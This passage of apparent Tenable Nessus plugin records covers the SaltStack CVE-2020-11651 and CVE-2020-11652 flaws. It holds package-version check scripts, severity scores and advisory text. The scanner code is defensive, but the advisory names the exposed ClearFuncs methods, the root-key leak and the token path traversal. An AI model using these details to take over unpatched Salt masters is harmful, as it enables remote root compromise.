value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is 
Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! 
preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python2-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python3-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-api-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-cloud-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-doc-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-master-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-minion-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-proxy-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-ssh-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-standalone-formulas-configuration-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-syndic-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python2-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python3-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-doc-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-minion-2019.2.0-6.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:13:44", "description": "F-Secure reports : CVE-2020-11651 - Authentication bypass vulnerabilities The ClearFuncs class processes unauthenticated requests and unintentionally exposes the _send_pub() method, which can be used to queue messages directly on the master publish server. Such messages can be used to trigger minions to run arbitrary commands as root.\n\nThe ClearFuncs class also exposes the method _prep_auth_info(), which returns the 'root key' used to authenticate commands from the local root user on the master server. This 'root key' can then be used to remotely call administrative commands on the master server. This unintentional exposure provides a remote un-authenticated attacker with root-equivalent access to the salt master.\n\nCVE-2020-11652 - Directory traversal vulnerabilities The wheel module contains commands used to read and write files under specific directory paths. The inputs to these functions are concatenated with the target directory and the resulting path is not canonicalized, leading to an escape of the intended path restriction.\n\nThe get_token() method of the salt.tokens.localfs class (which is exposed to unauthenticated requests by the ClearFuncs class) fails to sanitize the token input parameter which is then used as a filename, allowing insertion of '..' path elements and thus reading of files outside of the intended directory. 
The only restriction is that the file has to be deserializable by salt.payload.Serial.loads().", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "nessus", "title": "FreeBSD : salt -- multiple vulnerabilities in salt-master process (6bf55af9-973b-11ea-9f2c-38d547003487)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:py27-salt", "p-cpe:/a:freebsd:freebsd:py32-salt", "p-cpe:/a:freebsd:freebsd:py33-salt", "p-cpe:/a:freebsd:freebsd:py34-salt", "p-cpe:/a:freebsd:freebsd:py35-salt", "p-cpe:/a:freebsd:freebsd:py36-salt", "p-cpe:/a:freebsd:freebsd:py37-salt", "p-cpe:/a:freebsd:freebsd:py38-salt", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_6BF55AF9973B11EA9F2C38D547003487.NASL", "href": "https://www.tenable.com/plugins/nessus/136687", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# 
Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136687);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"FreeBSD : salt -- multiple 
vulnerabilities in salt-master process (6bf55af9-973b-11ea-9f2c-38d547003487)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"F-Secure reports : CVE-2020-11651 - Authentication bypass\nvulnerabilities The ClearFuncs class processes unauthenticated\nrequests and unintentionally exposes the _send_pub() method, which can\nbe used to queue messages directly on the master publish server. Such\nmessages can be used to trigger minions to run arbitrary commands as\nroot.\n\nThe ClearFuncs class also exposes the method _prep_auth_info(), which\nreturns the 'root key' used to authenticate commands from the local\nroot user on the master server. This 'root key' can then be used to\nremotely call administrative commands on the master server. This\nunintentional exposure provides a remote un-authenticated attacker\nwith root-equivalent access to the salt master.\n\nCVE-2020-11652 - Directory traversal vulnerabilities The wheel module\ncontains commands used to read and write files under specific\ndirectory paths. The inputs to these functions are concatenated with\nthe target directory and the resulting path is not canonicalized,\nleading to an escape of the intended path restriction.\n\nThe get_token() method of the salt.tokens.localfs class (which is\nexposed to unauthenticated requests by the ClearFuncs class) fails to\nsanitize the token input parameter which is then used as a filename,\nallowing insertion of '..' path elements and thus reading of files\noutside of the intended directory. 
The only restriction is that the\nfile has to be deserializable by salt.payload.Serial.loads().\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://labs.f-secure.com/advisories/saltstack-authorization-bypass\");\n # https://blog.f-secure.com/new-vulnerabilities-make-exposed-salt-hosts-easy-targets/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f051ee1b\");\n # https://www.tenable.com/blog/cve-2020-11651-cve-2020-11652-critical-salt-framework-vulnerabilities-exploited-in-the-wild\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4975c617\");\n # https://vuxml.freebsd.org/freebsd/6bf55af9-973b-11ea-9f2c-38d547003487.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d05a29b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py27-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py32-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py33-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py34-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py35-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py36-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py37-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py38-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"py27-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py27-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py32-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py32-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py33-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py33-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py34-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py34-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py35-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py35-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py36-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py36-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py37-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py37-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py38-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py38-salt>=3000<3000.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:12:38", "description": "Several vulnerabilities were 
discovered in salt, a powerful remote execution manager, which could result in retrieve of user tokens from the salt master, execution of arbitrary commands on salt minions, arbitrary directory access to authenticated users or arbitrary code execution on salt-api hosts.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-07T00:00:00", "type": "nessus", "title": "Debian DSA-4676-1 : salt - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17361", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:salt", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4676.NASL", "href": "https://www.tenable.com/plugins/nessus/136372", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4676. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136372);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-17361\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"DSA\", value:\"4676\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Debian DSA-4676-1 : salt - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=949222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=959684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/salt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/salt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/salt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4676\"\n );\n script_set_attribute(\n attribute:\"solution\",\n 
value:\n\"Upgrade the salt packages.\n\nFor the oldstable distribution (stretch), these problems have been\nfixed in version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 2018.3.4+dfsg1-6+deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and 
is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"salt-api\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-cloud\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-common\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-doc\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-master\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-minion\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-proxy\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-ssh\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"salt-syndic\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-api\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-cloud\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-common\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-doc\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", 
prefix:\"salt-master\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-minion\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-proxy\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-ssh\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-syndic\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:16:43", "description": "This update fixes the following issues :\n\nsalt :\n\nFix for TypeError in Tornado importer (bsc#1174165)\n\nRequire python3-distro only for TW (bsc#1173072)\n\nVarious virt backports from 3000.2\n\nAvoid traceback on debug logging for swarm module (bsc#1172075)\n\nAdd publish_batch to ClearFuncs exposed methods\n\nUpdate to salt version 3000 See release notes:\nhttps://docs.saltstack.com/en/latest/topics/releases/3000.html\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nTestsuite fix\n\nAdd option to enable/disable force refresh for zypper\n\nPython3.8 compatibility changes\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions because of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load managing SSH minions (bsc#1169604)\n\nRevert broken changes to slspath made on Salt 3000 (saltstack/salt#56341) (bsc#1170104)\n\nReturns a the list of IPs filtered by the optional network list\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nDo not require vendored backports-abc (bsc#1170288)\n\nFix 
partition.mkpart to work without fstype (bsc#1169800)\n\nEnable building and installation for Fedora\n\nDisable python2 build on Tumbleweed We are removing the python2 interpreter from openSUSE (SLE16). As such disable salt building for python2 there.\n\nMore robust remote port detection\n\nSanitize grains loaded from roster_grains.json cache during 'state.pkg'\n\nDo not make file.recurse state to fail when msgpack 0.5.4 (bsc#1167437)\n\nBuild: Buildequire pkgconfig(systemd) instead of systemd pkgconfig(systemd) is provided by systemd, so this is de-facto no change. But inside the Open Build Service (OBS), the same symbol is also provided by systemd-mini, which exists to shorten build-chains by only enabling what other packages need to successfully build\n\nAdd new custom SUSE capability for saltutil state module\n\nFixes status attribute issue in aptpkg test\n\nMake setup.py script not to require setuptools greater than 9.1\n\nLoop: fix variable names for until_no_eval\n\nDrop conflictive module.run state patch (bsc#1167437)\n\nUpdate patches after rebase with upstream v3000 tag (bsc#1167437)\n\nFix some requirements issues depending on Python3 versions\n\nRemoves obsolete patch\n\nFix for low rpm_lowpkg unit test\n\nAdd python-singledispatch as dependency for python2-salt\n\nVirt._get_domain: don't raise an exception if there is no VM\n\nFix for temp folder definition in loader unit test\n\nAdds test for zypper abbreviation fix\n\nImproved storage pool or network handling\n\nBetter import cache handline\n\nMake 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python 2\n\nFix regression in service states with reload argument\n\nFix integration test failure for test_mod_del_repo_multiline_values\n\nFix for unless requisite when pip is not installed\n\nFix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation\n\nFix tornado imports and missing _utils after rebasing patches\n\nRemoves unresolved merge conflict in yumpkg module\n\nUse full option 
name instead of undocumented abbreviation for zypper\n\nRequiring python3-distro only for openSUSE/SLE >= 15 and not for Python 2 builds\n\nAvoid possible user escalation upgrading salt-master (bsc#1157465) (CVE-2019-18897)\n\nFix unit tests failures in test_batch_async tests\n\nBatch Async: Handle exceptions, properly unregister and close instances after running async batching to avoid CPU starvation of the MWorkers (bsc#1162327)\n\nRHEL/CentOS 8 uses platform-python instead of python3\n\nLoader: invalidate the import cachefor extra modules\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nImprovements for chroot module\n\nAdd option to enable/disable force refresh for zypper\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions because of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load managing SSH minions (bsc#1169604)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
